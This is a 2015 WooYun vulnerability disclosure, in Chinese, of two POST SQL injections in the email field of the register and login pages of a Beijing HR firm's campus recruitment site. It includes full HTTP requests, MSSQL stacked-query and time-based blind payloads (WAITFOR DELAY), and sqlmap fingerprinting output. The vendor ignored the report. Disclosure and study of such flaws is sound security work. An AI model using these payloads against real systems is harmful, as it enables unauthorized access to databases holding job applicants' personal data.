当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103677

漏洞标题:北京外企人力资源公司校园招聘网两处SQL注入

相关厂商:北京外企人力资源服务有限公司

漏洞作者: ucifer

提交时间:2015-03-25 18:47

修复时间:2015-03-30 18:48

公开时间:2015-03-30 18:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

都是POST注入

详细说明:

http://career.fesco.com.cn/register
post.txt如何:

POST /register HTTP/1.1
Host: career.fesco.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://career.fesco.com.cn/register
Cookie: lzstat_uv=62988003890204689|2631557; lzstat_ss=3083602118_1_1427296096_2631557
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTIxNDU3MjI1OTVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZCdG5SZWdq7Gednoo9Pgy47dsVj6rKnVrnRcQ1prlVFELq3aXpNQ%3D%3D&__VIEWSTATEGENERATOR=799CC77D&txtEmail=123%40qq.com&txtEmail%24CVS=&txtPwd=123&txtPwd%24CVS=&txtRePwd=123&txtRePwd%24CVS=&BtnReg=&DXScript=1_32%2C1_61%2C2_22%2C2_29%2C2_15&BtnReg=


txtEmail参数存在时间盲注

Place: POST
Parameter: txtEmail
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTIxNDU3MjI1OTUPZBYCAgMPZBYGAgMPPCsABQEADxYCHgVWYWx1ZQUKMTIzQHFxLmNvbWRkAgcPPCsABQEADxYCHwAFAzEyM2RkAgsPPCsABQEADxYCHwAFAzEyM2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZCdG5SZWeh0Oe9ObWv8nnLkqPV3sKbSENeljlu0gZjlitiEHnM6g==&__VIEWSTATEGENERATOR=799CC77D&txtEmail=123@qq.com'; WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=123&txtPwd$CVS=&txtRePwd=123&txtRePwd$CVS=&BtnReg=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnReg=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTIxNDU3MjI1OTUPZBYCAgMPZBYGAgMPPCsABQEADxYCHgVWYWx1ZQUKMTIzQHFxLmNvbWRkAgcPPCsABQEADxYCHwAFAzEyM2RkAgsPPCsABQEADxYCHwAFAzEyM2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZCdG5SZWeh0Oe9ObWv8nnLkqPV3sKbSENeljlu0gZjlitiEHnM6g==&__VIEWSTATEGENERATOR=799CC77D&txtEmail=123@qq.com' WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=123&txtPwd$CVS=&txtRePwd=123&txtRePwd$CVS=&BtnReg=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnReg=
---


http://career.fesco.com.cn/login
post.txt如下:

POST /login HTTP/1.1
Host: career.fesco.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://career.fesco.com.cn/login
Cookie: lzstat_uv=62988003890204689|2631557; lzstat_ss=3083602118_1_1427296096_2631557; ASP.NET_SessionId=rvs3g4n4l4rsazuyn4alo3hn
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 347
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTcyNTQzNTgyOGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCEJ0bkxvZ2luBQZCdG5SZWfVy4voYCNxsXJNA1%2BF4nFBOmWUIZztmbLwXvZBUSJ92g%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&txtEmail=111%40qq.com&txtEmail%24CVS=&txtPwd=111&txtPwd%24CVS=&BtnLogin=&DXScript=1_32%2C1_61%2C2_22%2C2_29%2C2_15&BtnLogin=


参数txtEmail存在时间盲注

Place: POST
Parameter: txtEmail
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcyNTQzNTgyOA9kFgICAw9kFgQCAw88KwAFAQAPFgIeBVZhbHVlBQoxMTFAcXEuY29tZGQCBw88KwAFAQAPFgIfAAUDMTExZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCEJ0bkxvZ2luBQZCdG5SZWcicURw8hfZVrVqmEn7Wpvpg4q5tzRVv+cbykSGL1YsXg==&__VIEWSTATEGENERATOR=C2EE9ABB&txtEmail=111@qq.com'; WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=111&txtPwd$CVS=&BtnLogin=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnLogin=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcyNTQzNTgyOA9kFgICAw9kFgQCAw88KwAFAQAPFgIeBVZhbHVlBQoxMTFAcXEuY29tZGQCBw88KwAFAQAPFgIfAAUDMTExZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCEJ0bkxvZ2luBQZCdG5SZWcicURw8hfZVrVqmEn7Wpvpg4q5tzRVv+cbykSGL1YsXg==&__VIEWSTATEGENERATOR=C2EE9ABB&txtEmail=111@qq.com' WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=111&txtPwd$CVS=&BtnLogin=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnLogin=
---
[16:01:43] [INFO] testing Microsoft SQL Server
[16:01:43] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[16:01:48] [INFO] confirming Microsoft SQL Server
[16:02:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008


漏洞证明:

列数据库--

QQ截图20150325161552.png


当前用户--

QQ截图20150325163834.png


修复方案:

你懂de

版权声明:转载请注明来源 ucifer@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-30 18:48

厂商回复:

最新状态:

暂无